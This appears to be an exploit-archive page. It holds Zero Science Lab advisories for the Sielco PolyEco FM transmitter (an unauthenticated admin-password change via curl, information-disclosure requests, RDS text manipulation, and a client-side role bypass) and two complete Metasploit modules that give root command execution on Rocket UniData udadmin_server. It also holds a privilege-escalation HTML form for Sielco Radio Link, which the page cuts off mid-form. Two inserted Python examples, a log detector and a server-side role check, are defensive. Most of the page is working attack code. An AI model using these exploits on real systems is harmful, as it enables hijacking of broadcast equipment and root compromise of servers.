<pre><code><br />Sielco PolyEco Digital FM Transmitter 2.0.6 Account Takeover / Lockout / EoP<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19<br /> PolyEco1000 CPU:1.9.4 FPGA:10.19<br /> PolyEco1000 CPU:1.9.3 FPGA:10.19<br /> PolyEco500 CPU:1.7.0 FPGA:10.16<br /> PolyEco300 CPU:2.0.2 FPGA:10.19<br /> PolyEco300 CPU:2.0.0 FPGA:10.19<br /><br />Summary: PolyEco is the innovative family of high-end digital<br />FM transmitters of Sielco. They are especially suited as high<br />performance power system exciters or compact low-mid power<br />transmitters. The same cabinet may in fact be fitted with 50,<br />100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,<br />1000).<br /><br />All features can be controlled via the large touch-screen display<br />4.3" or remotely. Many advanced features are inside by default<br />in the basic version such as: stereo and RDS encoder, audio<br />change-over, remote-control via LAN and SNMP, "FFT" spectral<br />analysis of the audio sources, SFN synchronization and much more.<br /><br />Desc: The application suffers from an authentication bypass,<br />account takeover/lockout and elevation of privileges vulnerability<br />that can be triggered by directly calling the users object and<br />effectively modifying the password of the two constants user/role<br />(user/admin). 
This can be exploited by an unauthenticated adversary<br />by issuing a single POST request to the vulnerable endpoint and<br />gaining unauthorized access to the affected device with administrative<br />privileges.<br /><br />Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5765<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br /># Change admin pwd<br />$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm<br /></code></pre>
<pre><code><br />Sielco PolyEco Digital FM Transmitter 2.0.6 Unauthenticated Information Disclosure<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19<br /> PolyEco1000 CPU:1.9.4 FPGA:10.19<br /> PolyEco1000 CPU:1.9.3 FPGA:10.19<br /> PolyEco500 CPU:1.7.0 FPGA:10.16<br /> PolyEco300 CPU:2.0.2 FPGA:10.19<br /> PolyEco300 CPU:2.0.0 FPGA:10.19<br /><br />Summary: PolyEco is the innovative family of high-end digital<br />FM transmitters of Sielco. They are especially suited as high<br />performance power system exciters or compact low-mid power<br />transmitters. The same cabinet may in fact be fitted with 50,<br />100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,<br />1000).<br /><br />All features can be controlled via the large touch-screen display<br />4.3" or remotely. Many advanced features are inside by default<br />in the basic version such as: stereo and RDS encoder, audio<br />change-over, remote-control via LAN and SNMP, "FFT" spectral<br />analysis of the audio sources, SFN synchronization and much more.<br /><br />Desc: Sielco PolyEco is affected by an information disclosure<br />vulnerability due to improper access control enforcement. 
An<br />unauthenticated remote attacker can exploit this, via a specially<br />crafted request, to gain access to sensitive information.<br /><br />Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5766<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br />$ curl -s http://RADIOFM/factory.ssi<br />$ curl -s http://RADIOFM/rds.ssi<br />$ curl -s http://RADIOFM/ip.ssi<br />$ curl -s http://RADIOFM/alarm.ssi<br />$ curl -s http://RADIOFM/i2s.ssi<br />$ curl -s http://RADIOFM/time.ssi<br />$ curl -s http://RADIOFM/fft.ssi<br />$ curl -s http://RADIOFM/info.ssi<br />$ curl -s http://RADIOFM/status.ssi<br />$ curl -s http://RADIOFM/statusx.ssi<br />$ curl -s http://RADIOFM/audio.ssi<br />$ curl -s http://RADIOFM/smtp.ssi<br />$ curl -s http://RADIOFM/rf.ssi<br />$ curl -s http://RADIOFM/rfa.ssi<br />$ curl -s http://RADIOFM/ping.ssi<br />$ curl -s http://RADIOFM/lan.ssi<br />$ curl -s http://RADIOFM/kappa.ssi<br />$ curl -s http://RADIOFM/dbrt.ssi<br />$ curl -s http://RADIOFM/audiom.ssi<br />$ curl -s http://RADIOFM/log.ssi<br /></code></pre>
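<p>Added detection example, not part of either advisory: the two unauthenticated PolyEco issues above, the password change via POST to /protect/users.htm (ZSL-2023-5765) and the readable *.ssi pages (ZSL-2023-5766), can be spotted by a monitoring point in front of the transmitter. The code assumes a proxy, IDS or Zeek-style HTTP log that records method, URI, Cookie header and source address, and that a logged-in browser sends the 'polyeco' session cookie set by the device's login script (see the dologin() listing further down this page); the sample records are constructed.</p>

```python
"""Flag unauthenticated requests to the PolyEco endpoints named in the
advisories: POST /protect/users.htm (password change) and the *.ssi pages.
Assumption: a proxy/IDS record gives us method, URI, Cookie header and source.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Pages the advisory lists as readable without a session.
SSI_PAGES = {
    "factory", "rds", "ip", "alarm", "i2s", "time", "fft", "info", "status",
    "statusx", "audio", "smtp", "rf", "rfa", "ping", "lan", "kappa", "dbrt",
    "audiom", "log",
}
SSI_RE = re.compile(r"^/([a-z]+)\.ssi$")
# The device's login JavaScript stores the session id in a cookie named 'polyeco'.
SESSION_COOKIE = "polyeco"


@dataclass(frozen=True)
class HttpRecord:
    src: str
    method: str
    uri: str
    cookie: str  # raw Cookie header, "" when absent


def has_session(cookie_header: str) -> bool:
    """True when a non-empty polyeco=<id> cookie is present."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == SESSION_COOKIE and value:
            return True
    return False


def classify(rec: HttpRecord) -> Optional[str]:
    """Return an alert label for a suspicious record, or None."""
    path = rec.uri.split("?", 1)[0]  # ignore any query string
    if rec.method == "POST" and path == "/protect/users.htm":
        if not has_session(rec.cookie):
            return "unauthenticated-password-change"
        return "password-change"  # authenticated: audit, do not alert
    m = SSI_RE.match(path)
    if m and m.group(1) in SSI_PAGES and not has_session(rec.cookie):
        return "unauthenticated-ssi-read"
    return None


def scan(records: Iterable[HttpRecord]) -> Dict[str, List[str]]:
    """Group alert labels by source address."""
    hits: Dict[str, List[str]] = {}
    for rec in records:
        label = classify(rec)
        if label:
            hits.setdefault(rec.src, []).append(label)
    return hits


# Constructed sample traffic (not captured from a real device).
SAMPLE = [
    HttpRecord("10.0.0.7", "GET", "/index.htm", ""),
    HttpRecord("10.0.0.7", "GET", "/protect/index.htm", "polyeco=48213"),
    HttpRecord("10.0.0.7", "POST", "/protect/users.htm", "polyeco=48213"),
    HttpRecord("198.51.100.9", "GET", "/log.ssi", ""),
    HttpRecord("198.51.100.9", "GET", "/factory.ssi?x=1", ""),
    HttpRecord("198.51.100.9", "POST", "/protect/users.htm", ""),
]

if __name__ == "__main__":
    for src, labels in scan(SAMPLE).items():
        print(src, labels)
```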
<pre><code><br />Sielco PolyEco Digital FM Transmitter 2.0.6 Radio Data System POST Manipulation<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19<br /> PolyEco1000 CPU:1.9.4 FPGA:10.19<br /> PolyEco1000 CPU:1.9.3 FPGA:10.19<br /> PolyEco500 CPU:1.7.0 FPGA:10.16<br /> PolyEco300 CPU:2.0.2 FPGA:10.19<br /> PolyEco300 CPU:2.0.0 FPGA:10.19<br /><br />Summary: PolyEco is the innovative family of high-end digital<br />FM transmitters of Sielco. They are especially suited as high<br />performance power system exciters or compact low-mid power<br />transmitters. The same cabinet may in fact be fitted with 50,<br />100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,<br />1000).<br /><br />All features can be controlled via the large touch-screen display<br />4.3" or remotely. Many advanced features are inside by default<br />in the basic version such as: stereo and RDS encoder, audio<br />change-over, remote-control via LAN and SNMP, "FFT" spectral<br />analysis of the audio sources, SFN synchronization and much more.<br /><br />Desc: Improper access control occurs when the application provides<br />direct access to objects based on user-supplied input. As a result<br />of this vulnerability attackers can bypass authorization and access<br />resources behind protected pages. The application interface allows<br />users to perform certain actions via HTTP requests without performing<br />any validity checks to verify the requests. 
This can be exploited<br />to perform certain actions and manipulate the RDS text display.<br /><br />Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5767<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br />POST /protect/rds.htm HTTP/1.1<br />Host: RADIOFM<br /><br />rds_inta=1<br />rds_intb=0<br />rds_pi=381<br />rds_ps=ZSL<br />rds_rta=www.zeroscience.mk<br />rds_rtb<br />rds_rtt=0<br />rds_tp=0<br />rds_tp=1<br />rds_ta=0<br />rds_ms=0<br />rds_pty=4<br />rds_ptyn= <br />rds_ecc=00<br />rds_ct=0<br />rds_level=90<br />rds_psd=0<br />rds_psd1<br />rds_pst1=0<br />rds_psd5<br />rds_pst5=0<br />rds_psd2<br />rds_pst2=0<br />rds_psd6<br />rds_pst6=0<br />rds_psd3<br />rds_pst3=0<br />rds_psd7<br />rds_pst7=0<br />rds_psd4<br />rds_pst4=0<br />rds_psd8<br />rds_pst8=0<br />rds_di_pty=0<br />rds_di_cmp=0<br />rds_di_cmp=1<br />rds_di_st=0<br />rds_di_art=0<br />rds_di_art=1<br />a0=90<br />a1=9<br />a2=26<br />a3=115<br />a4=0<br />a5=0<br />a6=0<br />a7=0<br />a8=0<br />a9=0<br />a10=0<br />a11=0<br />a12=0<br />a13=0<br />a14=0<br />a15=0<br />a16=0<br />a17=0<br />a18=0<br />a19=0<br />a20=0<br />a21=0<br />a22=0<br />a23=0<br />a24=0<br /></code></pre>
<pre><code><br />Sielco PolyEco Digital FM Transmitter 2.0.6 Authorization Bypass Factory Reset<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19<br /> PolyEco1000 CPU:1.9.4 FPGA:10.19<br /> PolyEco1000 CPU:1.9.3 FPGA:10.19<br /> PolyEco500 CPU:1.7.0 FPGA:10.16<br /> PolyEco300 CPU:2.0.2 FPGA:10.19<br /> PolyEco300 CPU:2.0.0 FPGA:10.19<br /><br />Summary: PolyEco is the innovative family of high-end digital<br />FM transmitters of Sielco. They are especially suited as high<br />performance power system exciters or compact low-mid power<br />transmitters. The same cabinet may in fact be fitted with 50,<br />100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,<br />1000).<br /><br />All features can be controlled via the large touch-screen display<br />4.3" or remotely. Many advanced features are inside by default<br />in the basic version such as: stereo and RDS encoder, audio<br />change-over, remote-control via LAN and SNMP, "FFT" spectral<br />analysis of the audio sources, SFN synchronization and much more.<br /><br />Desc: Improper access control occurs when the application provides<br />direct access to objects based on user-supplied input. 
As a result<br />of this vulnerability attackers can bypass authorization and access<br />resources behind protected pages.<br /><br />Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5768<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br />index.htm:<br />----------<br />54: function dologin() {<br />55: var hash = hex_md5($('#password').val() + id);<br />56: $.get('/login.cgi', {<br />57: user: $('#user').val(),<br />58: password: hash,<br />59: id: id<br />60: }).done(function (data) {<br />61: var dati = $.parseXML(data);<br />62: id = $(dati).find('id').text();<br />63: user = $(dati).find('u').text();<br />64: if (id == 0)<br />65: window.location.href = '/index.htm';<br />66: else {<br />67: scriviCookie('polyeco', id, 180);<br />68: if (user >= 3)<br />69: window.location.href = '/protect/factory.htm';<br />70: else<br />71: window.location.href = '/protect/index.htm';<br />72: }<br />73: });<br />74: }<br /><br /><br />The function 'dologin()' in index.htm is called when a user submits a login form.<br />It starts by calculating a hash of the user-entered password and a variable 'id'<br />using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi'<br />endpoint with the user's entered username, the calculated password hash and the<br />'id' variable as parameters. 
If the request is successful, the function parses the<br />XML data returned from the server, extracting the values of the 'id' and 'u' elements.<br />Then it checks the value of the 'id' variable: if it equals 0, it redirects<br />the user to '/index.htm'; otherwise it writes a cookie called 'polyeco' with the<br />value of 'id' that expires after 180 days.<br /><br />After that it checks the value of the 'user' variable: if it is greater than or equal<br />to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the<br />user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side<br />JavaScript to always set the 'user' variable to a high value (4), or by tampering with<br />the data sent to the server during the login process to change the value of the 'user'<br />variable. It also works if the server's response variable 'user' is modified.<br /></code></pre>
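<p>Added example, not the device firmware: a minimal server-side model of the login exchange described above (the browser answers with md5 of password plus 'id', the server replies with 'id' and 'u') in which the role bound to a session is stored and checked on the server, so the browser's 'user' value decides nothing. The accounts, passwords, role names and per-path policy are assumed; the 'u' threshold of 3 for factory.htm is the page's.</p>

```python
"""Server-side role enforcement for the PolyEco login flow.
The page's client decides the redirect from 'u'; here the server keeps
session -> role and checks it on every /protect/ request.
"""
import hashlib
import secrets
from typing import Dict, Optional, Tuple

# Role levels as the page's JavaScript reads them: 'u' >= 3 reaches factory.htm.
ROLE_USER = 1
ROLE_ADMIN = 3

# Constructed account table: username -> (password, role)
ACCOUNTS = {"user": ("user-pass", ROLE_USER), "admin": ("admin-pass", ROLE_ADMIN)}

# Minimum role required per protected path (assumed policy).
PATH_POLICY = {"/protect/index.htm": ROLE_USER, "/protect/factory.htm": ROLE_ADMIN}


class Server:
    def __init__(self) -> None:
        self.challenges = set()          # outstanding pre-login 'id' values
        self.sessions: Dict[str, int] = {}  # session id -> role (the only source of truth)

    def new_challenge(self) -> str:
        """The 'id' the page hands out before login; used once."""
        c = secrets.token_hex(8)
        self.challenges.add(c)
        return c

    def login(self, user: str, response: str, challenge: str) -> Tuple[str, int]:
        """Mirror of /login.cgi: returns (id, u). id == "0" means failure."""
        if challenge not in self.challenges:
            return "0", 0
        self.challenges.discard(challenge)
        pw, role = ACCOUNTS.get(user, (None, 0))
        if pw is None:
            return "0", 0
        expected = hashlib.md5((pw + challenge).encode()).hexdigest()
        if not secrets.compare_digest(expected.encode(), response.encode()):
            return "0", 0
        sid = secrets.token_urlsafe(16)  # unguessable, unlike a short numeric id
        self.sessions[sid] = role
        return sid, role

    def authorize(self, cookie_id: Optional[str], path: str) -> bool:
        """Decision for a /protect/ request: the role comes from the session
        table, never from anything the client sends or redirects itself to."""
        required = PATH_POLICY.get(path)
        if required is None:
            return False
        return self.sessions.get(cookie_id or "", 0) >= required


def client_login(server: Server, user: str, password: str) -> Tuple[str, int]:
    """What dologin() does: hex_md5(password + id), then GET /login.cgi."""
    challenge = server.new_challenge()
    resp = hashlib.md5((password + challenge).encode()).hexdigest()
    return server.login(user, resp, challenge)


def tampered_attempt(server: Server) -> bool:
    """A low-privilege user whose browser pretends 'u' is 4 (the page's bypass)
    still needs the server's agreement when factory.htm is requested."""
    sid, u = client_login(server, "user", "user-pass")
    u = 4  # client-side tampering changes only a local variable
    return server.authorize(sid, "/protect/factory.htm")
```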
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::Unirpc<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Rocket Software Unidata udadmin_server Authentication Bypass',<br /> 'Description' => %q{<br /> This module exploits an authentication bypass vulnerability in the<br /> Linux version of udadmin_server, which is an RPC service that comes<br /> with the Rocket Software UniData server. This affects versions of<br /> UniData prior to 8.2.4 build 3003.<br /><br /> This service typically runs as root. It accepts a username of<br /> ":local:" and a password in the form of "<username>:<uid>:<gid>",<br /> where username and uid must be a valid account, but gid can be<br /> anything except 0.<br /><br /> This exploit takes advantage of this login account to authenticate<br /> as a chosen user and run an arbitrary command (using the built-in<br /> OsCommand message).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ron Bowes', # Discovery, PoC, module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed' ],<br /> [ 'CVE', '2023-28503' ],<br /> ],<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> 
],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 31438,<br /> 'PrependFork' => true<br /> },<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2023-03-30',<br /> 'Notes' => {<br /> 'SideEffects' => [],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'Stability' => [CRASH_SAFE]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('UNIRPC_USERNAME', [ true, 'Linux username to authenticate with (must match the uid)', 'root']),<br /> OptInt.new('UNIRPC_UID', [ true, 'Linux uid to authenticate with (must correspond to the username)', 0]),<br /> OptInt.new('UNIRPC_GID', [ true, 'gid to authenticate with (must not be 0, does not need to correspond to the username)', 1000]),<br /> ]<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptString.new('UNIRPC_ENDPOINT', [ true, 'The UniRPC service to request', 'udadmin']),<br /> ]<br /> )<br /> end<br /><br /> # We can detect UniRPC by performing a version check, but the version number<br /> # didn't increment in the patch (only the build number did, which AFAICT we<br /> # can't access), so just do a sanity check<br /> def check<br /> version = unirpc_get_version<br /> vprint_status("Detected UniRPC version #{version} is running")<br /><br /> Exploit::CheckCode::Detected<br /> rescue UniRPCCommunicationError => e<br /> return CheckCode::Safe("Could not communicate with the UniRPC server: #{e}")<br /> rescue UniRPCUnexpectedResponseError => e<br /> return CheckCode::Safe("UniRPC server returned something unexpected: #{e}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status('Sending OsCommand request')<br /> sock.put(build_unirpc_message(args: [<br /> # Message type<br /> { type: :integer, value: UNIRPC_MESSAGE_OSCOMMAND },<br /> { type: :string, value: cmd },<br /> ]))<br /> end<br /><br /> def exploit<br /> # Sanity check<br /> if datastore['UNIRPC_GID'] == 0<br /> fail_with(Failure::BadConfig, 'UNIRPC_GID cannot be 0')<br /> 
end<br /><br /> # Connect to the service<br /> connect<br /><br /> # Connect to the RPC service (probably "udadmin")<br /> vprint_status("Connecting to UniRPC endpoint #{datastore['UNIRPC_ENDPOINT']}")<br /> sock.put(build_unirpc_message(args: [<br /> # Service name<br /> { type: :string, value: datastore['UNIRPC_ENDPOINT'] },<br /><br /> # "Secure" flag - this must be non-zero if the server is started in<br /> # "secure" mode (-s)<br /> { type: :integer, value: 1 },<br /> ]))<br /><br /> # This will throw an error if the login fails, otherwise we can discard the<br /> # result<br /> recv_unirpc_message(sock, first_result_is_status: true)<br /><br /> # Prepare the authentication bypass<br /> username = ':local:'<br /> password = "#{datastore['UNIRPC_USERNAME']}:#{datastore['UNIRPC_UID']}:#{datastore['UNIRPC_GID']}"<br /> vprint_status("Authenticating to RPC service as #{username} / #{password}")<br /><br /> # Send the authentication message<br /> sock.put(build_unirpc_message(args: [<br /> # Message type<br /> { type: :integer, value: UNIRPC_MESSAGE_LOGIN },<br /><br /> # Username<br /> # ":local:" is a special value that skips login<br /> { type: :string, value: username },<br /><br /> # Password (encoded by making each byte negative)<br /> # I think if username is :local:, this is username:uid:gid (gid can't be 0)<br /> { type: :string, value: password.bytes.map { |b| (0x0FF & (~b)).chr }.join },<br /> ]))<br /><br /> # Once again, we only care if this fails - if the status is an error<br /> recv_unirpc_message(sock, first_result_is_status: true)<br /><br /> # Run the command(s)<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> rescue UniRPCCommunicationError => e<br /> fail_with(Failure::Unreachable, "Could not communicate with the UniRPC server: #{e}")<br /> rescue UniRPCUnexpectedResponseError => e<br /> fail_with(Failure::UnexpectedReply, "UniRPC server 
returned something unexpected: #{e}")<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = GoodRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::Unirpc<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> OFFSETS = {<br /> '8.2.4' => {<br /> # The amount of padding required to overwrite the return addr<br /> 'offset' => 0x2b8,<br /><br /> # This returns to "mov rdi, rsp / call system", which means the<br /> # remainder of what's on the stack will be passed to system()<br /> 'return_address' => 0x412e25<br /> }<br /> }<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Rocket Software Unidata udadmin_server Stack Buffer Overflow in Password',<br /> 'Description' => %q{<br /> This module exploits an authentication bypass vulnerability in the<br /> Linux version of udadmin_server, which is an RPC service that comes<br /> with the Rocket Software UniData server, which runs as root.<br /><br /> This vulnerability affects UniData versions 8.2.4 build 3003 and<br /> earlier (for Linux), but this module specifically targets UniData<br /> version 8.2.4 build 3001. Other versions will crash the forked<br /> process, but will not otherwise affect the RPC server.<br /><br /> The username and password fields are copied to a stack-based buffer<br /> using a function that's equivalent to strcpy() (ie, has no bounds<br /> checking).
Additionally, the password field is encoded in such a way<br /> that we can include NUL bytes.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ron Bowes', # Discovery, PoC, module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed' ],<br /> [ 'CVE', '2023-28502' ],<br /> ],<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 31438,<br /> 'PrependFork' => true<br /> },<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> # Used for auto-selection<br /> 'Version' => '8.2.4',<br /><br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2023-03-30',<br /> 'Notes' => {<br /> 'SideEffects' => [],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'Stability' => [CRASH_SERVICE_RESTARTS] # The forked process can crash<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptBool.new('EXIT_CLEANLY', [ true, 'If set, tries to kill the parent process with SIGTERM before it crashes', true]),<br /> OptEnum.new('UNIDATA_VERSION', [true, 'The version of UniData target. 
Automatic detection is the default.', 'auto', ['auto', '8.2.4'] ]),<br /> ]<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptString.new('UNIRPC_ENDPOINT', [ true, 'The UniRPC service to request', 'udadmin']),<br /> ]<br /> )<br /> end<br /><br /> # We can detect UniRPC by performing a version check, but the version number<br /> # didn't increment in the patch (only the build number did, which AFAICT we<br /> # can't access), so just do a sanity check<br /> def check<br /> @version = unirpc_get_version<br /> vprint_status("Detected UniRPC version #{@version} is running")<br /><br /> Exploit::CheckCode::Detected<br /> rescue UniRPCCommunicationError => e<br /> return CheckCode::Safe("Could not communicate with the UniRPC server: #{e}")<br /> rescue UniRPCUnexpectedResponseError => e<br /> return CheckCode::Safe("UniRPC server returned something unexpected: #{e}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # Connect to the service and authenticate before running the command stager<br /> connect<br /><br /> # Connect to the RPC service (probably "udadmin")<br /> vprint_status("Connecting to UniRPC endpoint #{datastore['UNIRPC_ENDPOINT']}")<br /> sock.put(build_unirpc_message(args: [<br /> # Service name<br /> { type: :string, value: datastore['UNIRPC_ENDPOINT'] },<br /><br /> # "Secure" flag - this must be non-zero if the server is started in<br /> # "secure" mode (-s)<br /> { type: :integer, value: 1 },<br /> ]))<br /> recv_unirpc_message(sock, first_result_is_status: true)<br /><br /> # Pick a random username<br /> username = rand_text_alpha(6..20)<br /><br /> # Start the password with random junk that writes to the stack<br /> password = rand_text_alpha(@offsets['offset'])<br /><br /> # Append the return address<br /> password += [@offsets['return_address']].pack('Q')<br /><br /> # Attempt to cleanly kill the parent process if we can (otherwise it<br /> # crashes)<br /> #<br /> # Because of how the payload goes onto the stack 
immediately after the<br /> # return address, we can't return into an `exit` call - all the parent<br /> # process can do is crash (which is logged).<br /> #<br /> # We CAN, however, prepend a command to cleanly kill the parent PID, making<br /> # it look like a standard exit (not logged).<br /> if datastore['EXIT_CLEANLY']<br /> password += 'kill -TERM $PPID & '<br /> end<br /><br /> # End with the command, which will be passed to system()<br /> password += cmd<br /><br /> # Check if the payload includes the `\xff` character, which will terminate<br /> # the string and break the module. This shouldn't ever appear in the actual<br /> # payload, which is base64-encoded, but this will catch a future return<br /> # address that would break the payload<br /> if password.include?("\xff")<br /> fail_with(Failure::BadConfig, 'Payload contains a 0xFF character, which will fail')<br /> end<br /><br /> vprint_status("Authenticating to RPC service as #{username} with a stack-overflowing password")<br /> sock.put(build_unirpc_message(args: [<br /> # Message type<br /> { type: :integer, value: UNIRPC_MESSAGE_LOGIN },<br /><br /> # Username<br /> { type: :string, value: username },<br /><br /> # Password (encoded by making each byte negative)<br /> { type: :string, value: password.bytes.map { |b| (0x0FF & (~b)).chr }.join },<br /> ]))<br /><br /> print_status('Payload sent')<br /> end<br /><br /> def exploit<br /> if datastore['UNIDATA_VERSION'] == 'auto'<br /> if @version.nil?<br /> vprint_status('Requesting the version number for automatic targeting...')<br /> @version = unirpc_get_version<br /> else<br /> vprint_status("Using the version number from earlier for targeting: #{@version}")<br /> end<br /> else<br /> @version = datastore['UNIDATA_VERSION']<br /> vprint_status("Using the version number from UNIDATA_VERSION for targeting: #{@version}")<br /> end<br /><br /> @offsets = OFFSETS[@version]<br /> if @offsets.nil?<br /> fail_with(Failure::NoTarget, "No matching target for 
version #{@version}")<br /> end<br /><br /> # Run the command(s)<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> rescue UniRPCCommunicationError => e<br /> fail_with(Failure::Unreachable, "Could not communicate with the UniRPC server: #{e}")<br /> rescue UniRPCUnexpectedResponseError => e<br /> fail_with(Failure::UnexpectedReply, "UniRPC server returned something unexpected: #{e}")<br /> end<br />end<br /></code></pre>
<pre><code><!--<br /><br /><br />Sielco Radio Link 2.06 Remote Privilege Escalation<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.06 (RTX19)<br /> 2.05 (RTX19)<br /> 2.00 (EXC19)<br /> 1.60 (RTX19)<br /> 1.59 (RTX19)<br /> 1.55 (EXC19)<br /><br />Summary: Sielco develops and produces radio links for all transmission<br />and reception needs, thanks to innovative units and excellent performances,<br />accompanied by a high reliability and low consumption.<br /><br />Desc: The application suffers from a privilege escalation vulnerability.<br />A user with Read permissions can elevate his/her privileges by sending<br />a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'<br />to integer value '1' for Write or '2' for Admin permissions.<br /><br />Tested on: lwIP/2.1.1<br /> Web/2.9.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5759<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5759.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br /><html><br /> <body><br /> <form action="http://radiolink/protect/users_rx.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="" /><br /> <input type="hidden" name="pwd0bis" value="" /><br /> <input type="hidden" name="user1" value="testingus" /><br /> <input type="hidden" name="pwd1" value="" /><br /> <input type="hidden" name="pwd1bis" value="" /><br /> <input type="hidden" name="auth1" value="2" /><br /> <input type="hidden" name="user2" 